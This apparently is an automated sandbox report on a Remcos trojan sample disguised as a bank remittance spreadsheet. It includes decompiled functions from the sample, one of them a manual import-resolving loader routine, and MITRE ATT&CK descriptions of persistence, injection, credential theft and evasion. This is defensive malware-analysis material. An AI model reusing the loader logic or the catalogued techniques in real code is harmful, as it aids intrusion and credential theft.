Opcode ID: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction ID: 5a6495d9c5bf32114adb3f6aa644e01b82198ca3e6267900558c7952ddd75583
Opcode Fuzzy Hash: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction Fuzzy Hash: CAE04F311182818BC311EF65E80569DB790FB51306F40053EE455D10F2EF354599DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043ABB8, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043ABB8(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E00435507(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0043A504())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0043A504())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E004445B6(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0043A504())) = 0x16;
					return E0043695D() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x0043abb8
0x0043abc1
0x0043abc6
0x0043abc9
0x0043abcd
0x0043abdc
0x0043abdf
0x0043abff
0x0043ac04
0x0043ac07
0x0043ac09
0x0043acd7
0x0043acdd
0x0043acf2
0x0043acfe
0x0043ad04
0x0043ad06
0x0043ad15
0x0043ad15
0x0043ad15
0x0043ad18
0x0043ad18
0x0043ad1c
0x0043ad1e
0x0043ad21
0x0043ad21
0x0043ad21
0x0043ad21
0x00000000
0x0043ad28
0x0043ad0d
0x00000000
0x0043ad0d
0x0043acdf
0x0043ace2
0x0043ace5
0x0043ace5
0x0043ace7
0x0043ace8
0x0043ace8
0x0043acec
0x00000000
0x0043acec
0x0043ac0f
0x0043ac15
0x0043ac42
0x0043ac4e
0x0043ac54
0x0043ac56
0x00000000
0x00000000
0x0043ac5c
0x0043ac62
0x0043ac65
0x0043acc1
0x0043acc6
0x0043acce
0x00000000
0x0043acce
0x0043ac67
0x0043ac6a
0x0043ac6c
0x0043ac6f
0x0043ac71
0x0043ac73
0x0043aca9
0x0043acb7
0x0043acbd
0x0043acbf
0x0043acd3
0x00000000
0x0043acd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ac75
0x0043ac75
0x0043ac75
0x0043ac78
0x0043ac7b
0x0043ac7d
0x00000000
0x00000000
0x0043ac87
0x0043ac8e
0x0043ac91
0x0043ac93
0x0043ac9b
0x0043ac9b
0x0043ac9e
0x0043ac9f
0x0043aca2
0x0043aca4
0x00000000
0x00000000
0x00000000
0x0043aca4
0x0043ac95
0x0043ac96
0x0043ac99
0x00000000
0x00000000
0x00000000
0x0043ac99
0x0043aca6
0x00000000
0x0043aca6
0x0043ac17
0x0043ac19
0x00000000
0x00000000
0x0043ac1f
0x0043ac22
0x0043ac26
0x0043ac29
0x0043ac2d
0x00000000
0x00000000
0x0043ac33
0x0043ac34
0x0043ac37
0x0043ac39
0x00000000
0x00000000
0x00000000
0x0043ac3b
0x00000000
0x0043ac22
0x0043abe6
0x00000000
0x0043abf1
0x0043abd3
0x0043abd9
0x00000000
0x0043abd9
0x0043ad30

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D39), ref: 0043AC4E
GetLastError.KERNEL32 ref: 0043AC5C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043ACB7

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
Instruction ID: 194ea371ff84ff86851054fe8b49944eeea2ba512111cdfb336a3f9b4c52f9a6
Opcode Fuzzy Hash: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
Instruction Fuzzy Hash: DC412930640246AFCF21CF65C844A7F7BA5EF09312F24616AF9955B391D7388D21C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4FE, Relevance: 5.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040F4FE(intOrPtr* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed short* _v20;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				signed short _t57;
				signed int _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t76;
				intOrPtr* _t79;
				intOrPtr _t80;
				void _t81;
				signed short* _t82;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_t88 = __ecx;
				_t87 = 1;
				_t41 =  *__ecx;
				_t68 =  *((intOrPtr*)(__ecx + 4));
				_v12 = _t68;
				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
					if(IsBadReadPtr(_t64, 0x14) == 0) {
						_t66 = _t64 + 0x10;
						while(1) {
							_t44 =  *((intOrPtr*)(_t66 - 4));
							if(_t44 == 0) {
								goto L23;
							}
							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
							_v8 = _t46;
							if(_t46 == 0) {
								_push(0x7e);
								goto L22;
							} else {
								_push(4 +  *(_t88 + 0xc) * 4);
								_push( *((intOrPtr*)(_t88 + 8)));
								_t80 = L0043AE34();
								if(_t80 == 0) {
									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
									_push(0xe);
									L22:
									SetLastError();
									_t87 = 0;
								} else {
									 *((intOrPtr*)(_t88 + 8)) = _t80;
									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
									_t81 =  *(_t66 - 0x10);
									if(_t81 == 0) {
										_t81 =  *_t66;
									}
									_t82 = _t81 + _v12;
									_t76 = _v8;
									_v16 =  *_t66 + _v12;
									_v20 = _t82;
									if( *_t82 != 0) {
										while(1) {
											_t57 =  *_t82;
											_push( *((intOrPtr*)(_t88 + 0x34)));
											if(_t57 >= 0) {
												_t58 = _t57 + _v12 + 2;
											} else {
												_t58 = _t57 & 0x0000ffff;
											}
											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
											_t79 = _v16;
											_t89 = _t89 + 0xc;
											 *_t79 = _t59;
											_t60 = _t79;
											_t76 = _v8;
											if( *_t60 == 0) {
												break;
											}
											_t82 =  &(_v20[2]);
											_v16 = _t60 + 4;
											_v20 = _t82;
											if( *_t82 != 0) {
												continue;
											} else {
											}
											goto L16;
										}
										_t87 = 0;
									}
									L16:
									if(_t87 == 0) {
										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t66 = _t66 + 0x14;
										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _t87;
			}

0x0040f505
0x0040f50a
0x0040f50b
0x0040f50d
0x0040f510
0x0040f51a
0x0040f527
0x0040f534
0x0040f53a
0x0040f53d
0x0040f53d
0x0040f542
0x00000000
0x00000000
0x0040f54f
0x0040f552
0x0040f559
0x0040f630
0x00000000
0x0040f55f
0x0040f569
0x0040f56a
0x0040f572
0x0040f578
0x0040f627
0x0040f62c
0x0040f632
0x0040f632
0x0040f638
0x0040f57e
0x0040f584
0x0040f587
0x0040f58a
0x0040f58d
0x0040f592
0x0040f594
0x0040f594
0x0040f596
0x0040f59e
0x0040f5a4
0x0040f5a7
0x0040f5aa
0x0040f5ac
0x0040f5ac
0x0040f5ae
0x0040f5b3
0x0040f5c0
0x0040f5b5
0x0040f5b5
0x0040f5b5
0x0040f5c4
0x0040f5c7
0x0040f5ca
0x0040f5cd
0x0040f5cf
0x0040f5d1
0x0040f5d7
0x00000000
0x00000000
0x0040f5df
0x0040f5e2
0x0040f5e5
0x0040f5eb
0x00000000
0x00000000
0x0040f5ed
0x00000000
0x0040f5eb
0x0040f5ef
0x0040f5ef
0x0040f5f1
0x0040f5f3
0x0040f612
0x0040f619
0x0040f5f5
0x0040f5f5
0x0040f606
0x00000000
0x00000000
0x0040f60c
0x0040f606
0x0040f5f3
0x0040f578
0x00000000
0x0040f559
0x0040f53d
0x0040f63a
0x0040f63a
0x0040f642

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
SetLastError.KERNEL32(0000007F), ref: 0040F619
SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report BoFA_Remittance Advice_21219.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre